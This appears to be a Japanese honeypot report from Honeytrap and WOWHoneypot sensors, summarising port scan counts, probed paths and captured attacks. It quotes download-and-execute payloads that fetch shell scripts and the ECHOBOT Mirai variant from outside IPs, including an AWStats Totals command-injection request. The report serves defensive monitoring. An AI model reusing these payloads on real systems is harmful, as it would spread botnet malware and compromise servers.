◾️Honeytrap

※80ポートは除く

＜国別検知数および検知数＞

＜ポート検知数（30日平均比）＞

ポート番号	サービス	件数	件数差(30日平均)
445	smb	3188	-707
23	telnet	768	-830
5900	vnc	425	-4690
3306	mysql	224	-14
3389	rdp	212	-111
2323	telnet	93	-14
51545	Unknown	47	44
3400	Unknown	40	36
3380	sns-channels	39	24
3307	opsession-prxy	38	-9

＜新規マルウェアダウンロード＞

新規マルウェア	attack_connection.payload.data_decrypted_2
hxxp:/\/178[.]33[.]181[.]23/sh	GET /shell?cd%20/tmp;wget%20hxxp:/%5C/178[.]33[.]181[.]23/sh%20-O%20gf;%20chmod%20777%20gf;./gf HTTP/1.1

＜ポート 7001宛の通信＞
Oracle WebLogic Server の脆弱性（CVE-2019-2729）が何か来ていないか確認しましたが、特に新しい検知はありませんでした。
検知ペイロード：
POST /_async/AsyncResponseService HTTP/1.1
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1

◾️WoWHoneeypot

＜国別検知数および検知数＞

＜検知パス一覧＞

wow_path	target	CVE	reference	count
/	-	-	-	27
/admin/assets/js/views/login.js	FreePBX	-	https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743	25
hxxp://110[.]249[.]212[.]46/testget	Unauthorized Relay	-	-	4
/ipc$	IPC	-	https://thinline196.hatenablog.com/entry/2018/09/23/153019	1
/robots.txt	-	-	-	1

＜新規検知パス一覧＞

＜マルウェアダウンロード＞

path	payload	count
/awstatstotals/awstatstotals.php	GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;cd%20/tmp;%20wget%20hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT.x86;%20chmod%20777%20ECHOBOT.x86;%20./ECHOBOT.x86;%20rm%20-rf%20ECHOBOT.x86;%20history%20-c;echo%20YYY;').exit().%24a[ HTTP/1.1..sort=].phpinfo().exit().$a[.User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1).Connection: Close..	1

新規パスはAWStats Totalsの脆弱性を狙ったもので、miraiの亜種であるECHOBOT をインストールさせようとする通信でした。
https://www.bugsearch.net/en/11876/awstats-totals-v114-multisort-remote-command-execution-cve-2008-3922.html